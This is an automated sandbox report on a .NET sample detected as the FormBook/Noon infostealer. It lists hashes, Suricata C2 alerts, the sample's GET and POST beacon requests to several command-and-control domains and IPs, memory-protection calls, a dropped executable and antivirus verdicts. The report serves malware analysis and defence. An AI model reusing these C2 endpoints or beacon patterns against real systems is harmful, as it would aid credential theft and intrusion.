popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

dy.exe

PE32 PE File .NET EXE
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 March 29, 2023, 5:32 p.m. March 29, 2023, 5:37 p.m.
Size 1.6MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 5d2a5e49ca03081b82c5aff2eed04770
SHA256 1659286992ddaa74349568fa72aea8ba44cd5c8b46ab038fea0aef3ab8cb6948
CRC32 3856C5E7
ssdeep 24576:Ktav0R77s3GvHCVLT1UROjYRSAN0XAVUr1W:K60PqZiOAZ0AC
Yara
  • Is_DotNET_EXE - (no description)
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53 2027863 ET INFO Observed DNS Query to .biz TLD Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2027876 ET INFO HTTP Request to Suspicious *.life Domain Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2027876 ET INFO HTTP Request to Suspicious *.life Domain Potentially Bad Traffic
UDP 192.168.56.101:54883 -> 8.8.8.8:53 2027867 ET INFO Observed DNS Query to .life TLD Potentially Bad Traffic
TCP 192.168.56.101:49175 -> 198.177.124.57:80 2027876 ET INFO HTTP Request to Suspicious *.life Domain Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 91.189.114.25:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 91.189.114.25:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 91.189.114.25:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 94.23.162.163:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 94.23.162.163:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 94.23.162.163:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 198.177.124.57:80 2027876 ET INFO HTTP Request to Suspicious *.life Domain Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 46.17.173.192:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 46.17.173.192:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 46.17.173.192:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 195.110.124.133:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 195.110.124.133:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 195.110.124.133:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49164 -> 34.117.168.233:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49164 -> 34.117.168.233:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49164 -> 34.117.168.233:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 219.94.129.181:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 219.94.129.181:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 219.94.129.181:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header suspicious_request GET http://www.organiclifestyle.biz/u62a/?uyJ6NZy=VvqZGz3PHJbSx1QTtGtZ27JbTMCS5Ic5/4p6o7fkYDsqsQXV00C4Mjy3HEa1fsrCkNg75FGvKvR0eCFVX6t17fJz0m/poFYbzV0qA3k=&GqUv=WJjJdRiak0
suspicious_features GET method with no useragent header suspicious_request GET http://www.coba.dev/u62a/?uyJ6NZy=o8SCP/YnJ49qk75I5z3GzELHmg2Up2LUiNCn13SbmA4goaf+g+1fYa13Odsfun9rvkIDAdpJippA+Y6N0xwu8NBanTjMGd5U2PfRiS4=&GqUv=WJjJdRiak0
suspicious_features GET method with no useragent header suspicious_request GET http://www.meandclementina.com/u62a/?uyJ6NZy=sEdvL1ZGkULv2A8bNXBRaRmdYx+eWL4gYtShFj4pbN8o5eHSa3QtYRl1ZjlPIya8jQvOFXB8wZUlu2C2FpqSzuYXIQNHQFur3PZxkFI=&GqUv=WJjJdRiak0
suspicious_features GET method with no useragent header suspicious_request GET http://www.marex.promo/u62a/?uyJ6NZy=HTOKBE+ideXsbClCFIZFlPYDAjUuWFn3t4knnx885+0EkjdUagvAPmmh9nOXJS6XsZrvZ1YpL3hurMR7Bu4FKovUyILBMkHn6uQL+64=&GqUv=WJjJdRiak0
suspicious_features GET method with no useragent header suspicious_request GET http://www.starauctioneerspro.com/u62a/?uyJ6NZy=xxICz6/4R5ldvKit9pQiZZ+jTsTJ1UXO3+kkY3b4PoRSc/9CGhnte6tVjQSTVfHBpnO/T6bLIQt5I4s4artxGH6TeZHS/DCwG7N4VUA=&GqUv=WJjJdRiak0
suspicious_features GET method with no useragent header suspicious_request GET http://www.lowcome.life/u62a/?uyJ6NZy=SpYuczb0I67O/JB79loYgv0QPNy9tmAedxSPiGXP/gajLTktWHzWDdz7w0u65687mA4BdpaJEcNqadlvkC0xWpASIIM+xKCPpUlgMWA=&GqUv=WJjJdRiak0
suspicious_features GET method with no useragent header suspicious_request GET http://www.kunimi.org/u62a/?uyJ6NZy=Do2YNZmdCCnGDS2WdMJQZ6ZCKAd/GRXgo7DNSK9yFY09r/FIwMWpAWGLeKjsO9QXj5EgxT/2XN8JUIdJtTBe0orCvwywWdiUJLw1V4E=&GqUv=WJjJdRiak0
request GET http://www.organiclifestyle.biz/u62a/?uyJ6NZy=VvqZGz3PHJbSx1QTtGtZ27JbTMCS5Ic5/4p6o7fkYDsqsQXV00C4Mjy3HEa1fsrCkNg75FGvKvR0eCFVX6t17fJz0m/poFYbzV0qA3k=&GqUv=WJjJdRiak0
request GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3370000.zip
request GET http://www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
request POST http://www.coba.dev/u62a/
request GET http://www.coba.dev/u62a/?uyJ6NZy=o8SCP/YnJ49qk75I5z3GzELHmg2Up2LUiNCn13SbmA4goaf+g+1fYa13Odsfun9rvkIDAdpJippA+Y6N0xwu8NBanTjMGd5U2PfRiS4=&GqUv=WJjJdRiak0
request POST http://www.meandclementina.com/u62a/
request GET http://www.meandclementina.com/u62a/?uyJ6NZy=sEdvL1ZGkULv2A8bNXBRaRmdYx+eWL4gYtShFj4pbN8o5eHSa3QtYRl1ZjlPIya8jQvOFXB8wZUlu2C2FpqSzuYXIQNHQFur3PZxkFI=&GqUv=WJjJdRiak0
request POST http://www.marex.promo/u62a/
request GET http://www.marex.promo/u62a/?uyJ6NZy=HTOKBE+ideXsbClCFIZFlPYDAjUuWFn3t4knnx885+0EkjdUagvAPmmh9nOXJS6XsZrvZ1YpL3hurMR7Bu4FKovUyILBMkHn6uQL+64=&GqUv=WJjJdRiak0
request POST http://www.starauctioneerspro.com/u62a/
request GET http://www.starauctioneerspro.com/u62a/?uyJ6NZy=xxICz6/4R5ldvKit9pQiZZ+jTsTJ1UXO3+kkY3b4PoRSc/9CGhnte6tVjQSTVfHBpnO/T6bLIQt5I4s4artxGH6TeZHS/DCwG7N4VUA=&GqUv=WJjJdRiak0
request POST http://www.lowcome.life/u62a/
request GET http://www.lowcome.life/u62a/?uyJ6NZy=SpYuczb0I67O/JB79loYgv0QPNy9tmAedxSPiGXP/gajLTktWHzWDdz7w0u65687mA4BdpaJEcNqadlvkC0xWpASIIM+xKCPpUlgMWA=&GqUv=WJjJdRiak0
request POST http://www.kunimi.org/u62a/
request GET http://www.kunimi.org/u62a/?uyJ6NZy=Do2YNZmdCCnGDS2WdMJQZ6ZCKAd/GRXgo7DNSK9yFY09r/FIwMWpAWGLeKjsO9QXj5EgxT/2XN8JUIdJtTBe0orCvwywWdiUJLw1V4E=&GqUv=WJjJdRiak0
request POST http://www.coba.dev/u62a/
request POST http://www.meandclementina.com/u62a/
request POST http://www.marex.promo/u62a/
request POST http://www.starauctioneerspro.com/u62a/
request POST http://www.lowcome.life/u62a/
request POST http://www.kunimi.org/u62a/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 786432
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00500000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00580000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2564
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2564
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b60000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00392000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00550000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0057f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00570000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00551000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00552000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00553000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2564
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0039a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 188416
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01311000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0131130b
process_handle: 0xffffffff
3221225713 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\dyke bin.exe
section {u'size_of_data': u'0x00033800', u'virtual_address': u'0x00002000', u'entropy': 7.933774856796704, u'name': u'.text', u'virtual_size': u'0x000337d9'} entropy 7.9337748568 description A section with a high entropy has been found
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Bkav W32.AIDetectNet.01
Lionic Trojan.Win32.Noon.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Heur.MSIL.Jalapeno.J.36
McAfee Artemis!5D2A5E49CA03
Malwarebytes Malware.AI.4281876581
VIPRE Gen:Heur.MSIL.Jalapeno.J.36
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanSpy:MSIL/Jalapeno.bf2a76bc
K7GW Trojan ( 005a13a11 )
K7AntiVirus Trojan ( 005a13a11 )
Arcabit Trojan.MSIL.Jalapeno.J.36
Cyren W32/MSIL_Agent.DQP.gen!Eldorado
Symantec ML.Attribute.HighConfidence
tehtris Generic.Malware
ESET-NOD32 a variant of Generik.KDMJUIJ
Cynet Malicious (score: 100)
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Spy.MSIL.Noon.gen
BitDefender Gen:Heur.MSIL.Jalapeno.J.36
Avast Win32:PWSX-gen [Trj]
Tencent Msil.Trojan-Spy.Noon.Mjgl
Zillya Trojan.Noon.Win32.27182
TrendMicro TROJ_GEN.R002C0DCM23
McAfee-GW-Edition BehavesLike.Win32.Infected.tm
Trapmine malicious.high.ml.score
FireEye Generic.mg.5d2a5e49ca03081b
Emsisoft Gen:Heur.MSIL.Jalapeno.J.36 (B)
SentinelOne Static AI - Malicious PE
Avira TR/Dropper.MSIL.Gen
MAX malware (ai score=80)
Antiy-AVL Trojan[Spy]/MSIL.Noon
Gridinsoft Ransom.Win32.Wacatac.sa
Microsoft Trojan:Win32/Leonem
ViRobot Trojan.Win.Z.Jalapeno.1641984
GData Gen:Heur.MSIL.Jalapeno.J.36
Google Detected
AhnLab-V3 Trojan/Win.Jalapeno.C5398063
Acronis suspicious
ALYac Gen:Heur.MSIL.Jalapeno.J.36
Cylance unsafe
Zoner Trojan.Win32.154580
TrendMicro-HouseCall TROJ_GEN.R002C0DCM23
Rising Spyware.Noon!8.E7C9 (CLOUD)
Yandex Trojan.Agent!/aykD+i9HE0
Ikarus Trojan.MSIL.Crypt
MaxSecure Trojan.Malware.300983.susgen
Fortinet PossibleThreat.PALLAS.H